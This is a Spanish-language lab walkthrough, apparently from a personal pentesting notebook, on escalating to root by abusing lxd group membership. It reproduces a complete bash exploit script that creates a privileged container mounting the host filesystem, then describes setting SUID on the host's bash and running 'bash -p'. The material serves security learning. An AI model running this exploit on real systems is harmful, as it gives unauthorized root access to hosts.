> For the complete documentation index, see [llms.txt](https://rodgar.gitbook.io/rodgar/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rodgar.gitbook.io/rodgar/othe/escalada-de-privilegios/abuso-de-grupos-de-usuario-especiales/lxd.md).

# LXD

LXD (Linux Containers Daemon) es una tecnología de contenedores para sistemas Linux que ofrece una experiencia de virtualización ligera y eficiente. A continuación, se describen algunas de las funciones y casos de uso principales de LXD.

<figure><img src="/files/cbo2wldWiN9mVlBRmkr4" alt=""><figcaption></figcaption></figure>

En un laboratorio local, observamos que yo como rodgar estoy en el grupo lxd, esto lo podemos aprovechar para escalar nuestros privilegios.

<figure><img src="/files/b2CcqqzqdgHFTuZLE5X8" alt=""><figcaption></figcaption></figure>

Buscamos con searchsploit un exploit y encontramos uno nos lo descarmos a local.

<pre class="language-bash"><code class="lang-bash"><strong>#!/usr/bin/env bash
</strong>
# ----------------------------------
# Authors: Marcelo Vazquez (S4vitar)
#	   Victor Lasa      (vowkin)
# ----------------------------------

# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
# Step 3: Run this script and you will get root [Victim Machine]
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine

function helpPanel(){
  echo -e "\nUsage:"
  echo -e "\t[-f] Filename (.tar.gz alpine file)"
  echo -e "\t[-h] Show this help panel\n"
  exit 1
}

function createContainer(){
  lxc image import $filename --alias alpine &#x26;&#x26; lxd init --auto
  echo -e "[*] Listing images...\n" &#x26;&#x26; lxc image list
  lxc init alpine privesc -c security.privileged=true
  lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
  lxc start privesc
  lxc exec privesc sh
  cleanup
}

function cleanup(){
  echo -en "\n[*] Removing container..."
  lxc stop privesc &#x26;&#x26; lxc delete privesc &#x26;&#x26; lxc image delete alpine
  echo " [√]"
}

set -o nounset
set -o errexit

declare -i parameter_enable=0; while getopts ":f:h:" arg; do
  case $arg in
    f) filename=$OPTARG &#x26;&#x26; let parameter_enable+=1;;
    h) helpPanel;;
  esac
done

if [ $parameter_enable -ne 1 ]; then
  helpPanel
else
  createContainer
fi
```
</code></pre>

El script nos dice que descarguemos esto en local  wget <https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine>.

<figure><img src="/files/QmnyF08iHigYMrhHUwCO" alt=""><figcaption></figcaption></figure>

Luego hacemos lo que se observa en la imagen, para hacer el bash build-alpine debes estar como root, en local no en la maquina victima.

<figure><img src="/files/oV1rMFosyv2OxcsJ7SFM" alt=""><figcaption></figcaption></figure>

Con el comando anterior se nos crear el alpine-v3 etc. Este archivo nos lo transferimos a la maquina que hemos comprometido.

<figure><img src="/files/VCCNSuxNqDRJKFIBoxKB" alt=""><figcaption></figcaption></figure>

Habiendo ya transferido el archivo a la maquina comprometida, nos lo ejecutamos de la forma en como se observa en la imagen, observamos que si hago un whoami somos root, pero dentro del contenedor lxd no dentro de la maquina real.

Entonces como escalamos privilegios en la maquina real, a eso vamos no te calientes plancha.

<figure><img src="/files/rEMhcQGsqpIMMIAnqE3j" alt=""><figcaption></figcaption></figure>

En el contenedor nos vamos ah donde se creo el contenedor /mnt/root/usr/bin y le damos permisos SUID a la bash.

Luego en otra terminal o te sales del contenedor y si listas los permisos antes y despues de la bash observamos que la bash se le asigno permisos SUID hacemos un bash -p y somos root, pero esta vez en la maquina real no en el contenedor.
